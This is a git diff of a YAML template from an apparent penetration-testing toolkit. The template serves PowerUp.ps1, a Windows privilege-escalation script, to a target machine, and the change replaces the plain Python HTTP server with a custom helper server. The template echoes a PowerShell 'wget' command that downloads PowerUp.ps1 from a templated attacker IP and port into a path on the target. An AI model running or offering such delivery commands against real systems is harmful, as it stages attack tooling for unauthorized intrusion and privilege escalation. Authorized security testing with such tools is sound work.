--- a/src/profi/templates/scripts/deliver-windows-PowerUp.ps1.yaml
+++ b/src/profi/templates/scripts/deliver-windows-PowerUp.ps1.yaml
@@ -14,4 +14,4 @@ content: |
   echo '                         -----CMD-----                          '; \
   echo 'Deliver only: powershell wget -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/PowerUp.ps1 -Outfile <%=$(esh variables/delivery_path_windows)%>\PowerUp.ps1'; \
   echo '================================================================'; \
-  python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+  python -m <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
